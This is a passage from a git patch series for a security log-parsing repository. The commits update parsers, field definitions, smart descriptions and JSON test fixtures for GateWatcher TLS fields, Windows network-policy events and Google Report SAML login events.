-    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}"
+    }
   },
   "expected": {
     "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}",

From 2c5909d2a02678580e98ccee0e606360c9ca9b9a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A9na=C3=AFg?=
 <126670263+LenaigKaliou@users.noreply.github.com>
Date: Tue, 12 Nov 2024 17:01:51 +0100
Subject: [PATCH 218/317] Delete .vscode/settings.json

Delete a unnecessary file
---
 .vscode/settings.json | 22 ----------------------
 1 file changed, 22 deletions(-)
 delete mode 100644 .vscode/settings.json

diff --git a/.vscode/settings.json b/.vscode/settings.json
deleted file mode 100644
index b92839d53..000000000
--- a/.vscode/settings.json
+++ /dev/null
@@ -1,22 +0,0 @@
-{
-    "workbench.colorCustomizations": {
-        "activityBar.activeBackground": "#65c89b",
-        "activityBar.background": "#65c89b",
-        "activityBar.foreground": "#15202b",
-        "activityBar.inactiveForeground": "#15202b99",
-        "activityBarBadge.background": "#945bc4",
-        "activityBarBadge.foreground": "#e7e7e7",
-        "commandCenter.border": "#15202b99",
-        "sash.hoverBorder": "#65c89b",
-        "statusBar.background": "#42b883",
-        "statusBar.foreground": "#15202b",
-        "statusBarItem.hoverBackground": "#359268",
-        "statusBarItem.remoteBackground": "#42b883",
-        "statusBarItem.remoteForeground": "#15202b",
-        "titleBar.activeBackground": "#42b883",
-        "titleBar.activeForeground": "#15202b",
-        "titleBar.inactiveBackground": "#42b88399",
-        "titleBar.inactiveForeground": "#15202b99"
-    },
-    "peacock.color": "#42b883"
-}
\ No newline at end of file

From 71bb0846a7cd6f72a28493543d4b1066215d3dcd Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Wed, 13 Nov 2024 10:52:05 +0100
Subject: [PATCH 219/317] Fixing tls and tls_* fields

---
 GateWatcher/aioniq/_meta/fields.yml  | 13 +++++++++----
 GateWatcher/aioniq/ingest/parser.yml |  5 +++--
 2 files changed, 12 insertions(+), 6 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 7fb7e28af..07bae26e7 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -384,14 +384,19 @@ gatewatcher.tlp:
   name: gatewatcher.tlp
   type: text
 
-gatewatcher.tls.sni:
+gatewatcher.tls:
+  description: This field contains all TLS data fields in a TLS metadata
+  name: gatewatcher.tls
+  type: text
+
+gatewatcher.tls_sni:
   description: This field represents the TLS SNI field in a TLS metadata
-  name: gatewatcher.tls.sni
+  name: gatewatcher.tls_sni
   type: text
 
-gatewatcher.tls.fingerprint:
+gatewatcher.tls_fingerprint:
   description: This field represents the TLS server fingerprint field in a TLS metadata
-  name: gatewatcher.tls.fingerprint
+  name: gatewatcher.tls_fingerprint
   type: text
 
 gatewatcher.ttp:
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index b71064e6d..3cc13d747 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -210,7 +210,8 @@ stages:
          tls.server.not_before: "{{json_load.message.tls.notbefore}}"
          tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
          tls.server.subject: "{{json_load.message.tls.subject}}"
-         gatewatcher.tls.sni: "{{json_load.message.tls.sni}}"
-         gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}"
+         gatewatcher.tls: "{{json_load.message.tls}}"
+         gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+         gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
          tls.version: "{{json_load.message.tls.version}}"
          tls.server.not_after: "{{json_load.message.tls.notafter}}"

From ec5851efc208a5fa84e247079c402e3bb4b2472d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 13 Nov 2024 15:45:33 +0100
Subject: [PATCH 220/317] refactor(Windows): merge source_ip and source_address
 into one stage

---
 Windows/windows/ingest/parser.yml | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 988ae3dbc..f0bd6640b 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -153,8 +153,7 @@ pipeline:
   - name: set_file
   - name: set_user
   - name: process_ids
-  - name: source_ip
-  - name: source_address
+  - name: set_source_fields
   - name: action_outcome
   - name: set_dll
     filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}"
@@ -1106,7 +1105,7 @@ stages:
           action.outcome: "failure"
         filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}"
 
-  source_ip:
+  set_source_fields:
     actions:
       - set:
           source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}"
@@ -1131,8 +1130,6 @@ stages:
       - set:
           source.ip: "{{source_ip_ip_address.event.ip}}"
 
-  source_address:
-    actions:
       - set:
           source.address: "{{json.event.SourceIp}}"
         filter: "{{json.event.SourceIp | is_ipaddress}}"

From 042e95418f89dd14ed87a57760af748a55ddbd75 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 13 Nov 2024 15:56:25 +0100
Subject: [PATCH 221/317] Add saml seervice to the parser

---
 Google Cloud/google-report/_meta/fields.yml   |  15 +++
 .../_meta/smart-descriptions.json             | 114 ++++++++++++++++++
 Google Cloud/google-report/ingest/parser.yml  |  20 +++
 .../tests/test_saml_login_success.json        |  63 ++++++++++
 .../tests/test_saml_login_success_1.json      |  63 ++++++++++
 5 files changed, 275 insertions(+)
 create mode 100644 Google Cloud/google-report/tests/test_saml_login_success.json
 create mode 100644 Google Cloud/google-report/tests/test_saml_login_success_1.json

diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..ad86f9169 100644
--- a/Google Cloud/google-report/_meta/fields.yml	
+++ b/Google Cloud/google-report/_meta/fields.yml	
@@ -42,3 +42,18 @@ google.report.token.type:
   description: Token type
   name: google.report.token.type
   type: keyword
+
+google.report.saml.status_code:
+  description: SAML response status
+  name: google.report.saml.status_code
+  type: keyword
+
+google.report.saml.initiator:
+  description: SAML requester of saml authentication
+  name: google.report.saml.initiator
+  type: keyword
+
+google.report.saml.application_name:
+  description: Saml SP application name
+  name: google.report.saml.application_name
+  type: keyword
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..6fa8c709a 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -168,6 +168,120 @@
       }
     ]
   },
+  {
+    "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "saml"
+      },
+      {
+        "field": "event.action",
+        "value": "login_success"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "google.report.saml.application_name"
+      },
+      {
+        "field": "google.report.saml.status_code"
+      }
+    ]
+  },
+  {
+    "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "saml"
+      },
+      {
+        "field": "event.action",
+        "value": "login_success"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "google.report.saml.application_name"
+      }
+    ]
+  },
+  {
+    "value": "User {user.email} successfully logged in by {network.application} service",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "saml"
+      },
+      {
+        "field": "event.action",
+        "value": "login_success"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "google.report.saml.application_name"
+      }
+    ]
+  },
+  {
+    "value": "User {user.email} failed to log in using {network.application} service : {event.reason}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "saml"
+      },
+      {
+        "field": "event.action",
+        "value": "login_failure"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "google.report.saml.application_name"
+      }
+    ]
+  },
+  {
+    "value": "User {user.email} failed to log in using {network.application} service",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "saml"
+      },
+      {
+        "field": "event.action",
+        "value": "login_failure"
+      },
+      {
+        "field": "user.email"
+      }
+    ]
+  },
+  {
+    "value": "User {user.email} failed to log in using {network.application} service : {event.reason}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "saml"
+      },
+      {
+        "field": "event.action",
+        "value": "login_failure"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "google.report.saml.application_name"
+      }
+    ]
+  },
   {
     "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
     "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index bd5fd0d4e..e00c5ee79 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -28,6 +28,8 @@ pipeline:
     filter: '{{ json_event.message.id.applicationName == "admin"}}'
   - name: set_vault_fields
     filter: '{{ json_event.message.id.applicationName == "vault"}}'
+  - name: set_saml_fields
+    filter: '{{ json_event.message.id.applicationName == "saml"}}'
   - name: set_parameters_fields
     filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
 
@@ -258,3 +260,21 @@ stages:
                 {%- endif -%}
             {% endfor %}
             {{ types|unique|list }}
+
+  set_saml_fields:
+    actions:
+      - set:
+          event.category: ["authentication"]
+          device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}'
+      
+      - set:
+          event.type: ["allowed"]
+        filter: '{{ json_event.message.events[0].name == "login_success"}}'
+      
+      - set:
+          event.type: ["denied"]
+          event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}'
+        filter: '{{ json_event.message.events[0].name == "login_failure"}}'   
diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json
new file mode 100644
index 000000000..a96c1fab6
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_saml_login_success.json	
@@ -0,0 +1,63 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    },
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}"
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}",
+    "event": {
+      "action": "login_success",
+      "category": [
+        "authentication"
+      ],
+      "dataset": "admin#reports#activity",
+      "type": [
+        "allowed"
+      ]
+    },
+    "@timestamp": "2024-11-07T14:26:15.515000Z",
+    "cloud": {
+      "account": {
+        "id": "C00000000"
+      }
+    },
+    "google": {
+      "report": {
+        "actor": {
+          "email": "John.doe@test.com"
+        },
+        "saml": {
+          "application_name": "AWS",
+          "initiator": "sp",
+          "status_code": "SUCCESS_URI"
+        }
+      }
+    },
+    "network": {
+      "application": "saml"
+    },
+    "related": {
+      "ip": [
+        "2.1.3.2"
+      ],
+      "user": [
+        "John.doe"
+      ]
+    },
+    "source": {
+      "address": "2.1.3.2",
+      "ip": "2.1.3.2"
+    },
+    "user": {
+      "domain": "test.com",
+      "email": "John.doe@test.com",
+      "id": "10344515534360000000",
+      "name": "John.doe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json
new file mode 100644
index 000000000..94e5f299f
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json	
@@ -0,0 +1,63 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    },
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}"
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}",
+    "event": {
+      "action": "login_success",
+      "category": [
+        "authentication"
+      ],
+      "dataset": "admin#reports#activity",
+      "type": [
+        "allowed"
+      ]
+    },
+    "@timestamp": "2024-11-07T14:24:58.191000Z",
+    "cloud": {
+      "account": {
+        "id": "C000000000"
+      }
+    },
+    "google": {
+      "report": {
+        "actor": {
+          "email": "John.doe@test.com"
+        },
+        "saml": {
+          "application_name": "AWS Client VPN",
+          "initiator": "sp",
+          "status_code": "SUCCESS_URI"
+        }
+      }
+    },
+    "network": {
+      "application": "saml"
+    },
+    "related": {
+      "ip": [
+        "8.6.15.1"
+      ],
+      "user": [
+        "John.doe"
+      ]
+    },
+    "source": {
+      "address": "8.6.15.1",
+      "ip": "8.6.15.1"
+    },
+    "user": {
+      "domain": "test.com",
+      "email": "John.doe@test.com",
+      "id": "113844576558700000000",
+      "name": "John.doe"
+    }
+  }
+}
\ No newline at end of file

From 49f05ead8e481396ef55f2e998ec6f1be38169d0 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 13 Nov 2024 16:00:13 +0100
Subject: [PATCH 222/317] feat(Windows): copy CallingStationID as source ip or
 source mac and copy AuthenticationServer as destination domain

---
 Windows/windows/ingest/parser.yml       | 13 +++++++++++++
 Windows/windows/tests/Event_6272.json   |  9 +++++++++
 Windows/windows/tests/Event_6273.json   |  9 +++++++++
 Windows/windows/tests/process_6272.json | 13 +++++++++++++
 4 files changed, 44 insertions(+)

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index f0bd6640b..c34ff2684 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -164,6 +164,8 @@ pipeline:
   - name: dns_fields
   - name: action_target
   - name: destination
+  - name: set_network_policy_fields
+    filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}"
   - name: rule
   - name: finalize
 
@@ -1150,6 +1152,17 @@ stages:
           source.address: "{{json_event.message.SourceAddr}}"
         filter: "{{json.event.SourceAddr | is_ipaddress}}"
 
+  set_network_policy_fields:
+    actions:
+      - set:
+          source.ip: "{{ json.event.CallingStationID }}"
+        filter: "{{json.event.CallingStationID | is_ipaddress}}"
+      - set:
+          source.mac: "{{ json.event.CallingStationID }}"
+        filter: "{{ final.source.ip == null }}"
+      - set:
+          destination.domain: "{{ json.event.AuthenticationServer }}"
+
   rule:
     actions:
       - set:
diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json
index 4a3212af2..20213504d 100644
--- a/Windows/windows/tests/Event_6272.json
+++ b/Windows/windows/tests/Event_6272.json
@@ -42,6 +42,14 @@
       "record_id": 1674356873,
       "type": "Security"
     },
+    "destination": {
+      "address": "auth.example.org",
+      "domain": "auth.example.org",
+      "registered_domain": "example.org",
+      "size_in_char": 16,
+      "subdomain": "auth",
+      "top_level_domain": "org"
+    },
     "host": {
       "hostname": "hostname.example.org",
       "name": "hostname.example.org"
@@ -63,6 +71,7 @@
     },
     "related": {
       "hosts": [
+        "auth.example.org",
         "hostname.example.org"
       ],
       "user": [
diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json
index 8ad5a2226..118cf2445 100644
--- a/Windows/windows/tests/Event_6273.json
+++ b/Windows/windows/tests/Event_6273.json
@@ -42,6 +42,14 @@
       "record_id": 783949626,
       "type": "Security"
     },
+    "destination": {
+      "address": "auth.example.org",
+      "domain": "auth.example.org",
+      "registered_domain": "example.org",
+      "size_in_char": 16,
+      "subdomain": "auth",
+      "top_level_domain": "org"
+    },
     "host": {
       "hostname": "hostname.example.org",
       "name": "hostname.example.org"
@@ -63,6 +71,7 @@
     },
     "related": {
       "hosts": [
+        "auth.example.org",
         "hostname.example.org"
       ],
       "user": [
diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json
index af1d9fe1d..3135f15c9 100644
--- a/Windows/windows/tests/process_6272.json
+++ b/Windows/windows/tests/process_6272.json
@@ -42,6 +42,11 @@
       "record_id": 2324634,
       "type": "Security"
     },
+    "destination": {
+      "address": "1.2.3.4",
+      "domain": "1.2.3.4",
+      "size_in_char": 7
+    },
     "host": {
       "hostname": "test",
       "name": "test"
@@ -63,12 +68,20 @@
     },
     "related": {
       "hosts": [
+        "1.2.3.4",
         "test"
       ],
+      "ip": [
+        "10.24.25.25"
+      ],
       "user": [
         "testUser"
       ]
     },
+    "source": {
+      "address": "10.24.25.25",
+      "ip": "10.24.25.25"
+    },
     "user": {
       "domain": "NT01",
       "id": "S-1-5-21-1111111111-111111111-1111111111-1111",

From 7c47ee4ee8a16e39ece3021bd65f19304c722bc8 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 13 Nov 2024 16:07:01 +0100
Subject: [PATCH 223/317] Apply linter

---
 Google Cloud/google-report/_meta/fields.yml   | 24 +++++++++----------
 Google Cloud/google-report/ingest/parser.yml  |  6 ++---
 .../tests/test_saml_login_success.json        |  4 ++--
 .../tests/test_saml_login_success_1.json      |  4 ++--
 4 files changed, 19 insertions(+), 19 deletions(-)

diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index ad86f9169..ad9d8d0a7 100644
--- a/Google Cloud/google-report/_meta/fields.yml	
+++ b/Google Cloud/google-report/_meta/fields.yml	
@@ -33,14 +33,14 @@ google.report.parameters.visibility:
   name: google.report.parameters.visibility
   type: keyword
 
-google.report.token.app_name:
-  description: Token authorization application name
-  name: google.report.token.app_name
+google.report.saml.application_name:
+  description: Saml SP application name
+  name: google.report.saml.application_name
   type: keyword
 
-google.report.token.type:
-  description: Token type
-  name: google.report.token.type
+google.report.saml.initiator:
+  description: SAML requester of saml authentication
+  name: google.report.saml.initiator
   type: keyword
 
 google.report.saml.status_code:
@@ -48,12 +48,12 @@ google.report.saml.status_code:
   name: google.report.saml.status_code
   type: keyword
 
-google.report.saml.initiator:
-  description: SAML requester of saml authentication
-  name: google.report.saml.initiator
+google.report.token.app_name:
+  description: Token authorization application name
+  name: google.report.token.app_name
   type: keyword
 
-google.report.saml.application_name:
-  description: Saml SP application name
-  name: google.report.saml.application_name
+google.report.token.type:
+  description: Token type
+  name: google.report.token.type
   type: keyword
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index e00c5ee79..3a0fce88f 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -269,12 +269,12 @@ stages:
           google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}'
           google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}'
           google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}'
-      
+
       - set:
           event.type: ["allowed"]
         filter: '{{ json_event.message.events[0].name == "login_success"}}'
-      
+
       - set:
           event.type: ["denied"]
           event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}'
-        filter: '{{ json_event.message.events[0].name == "login_failure"}}'   
+        filter: '{{ json_event.message.events[0].name == "login_failure"}}'
diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json
index a96c1fab6..8a9785816 100644
--- a/Google Cloud/google-report/tests/test_saml_login_success.json	
+++ b/Google Cloud/google-report/tests/test_saml_login_success.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Google Report",
         "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
       }
-    },
-    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}"
+    }
   },
   "expected": {
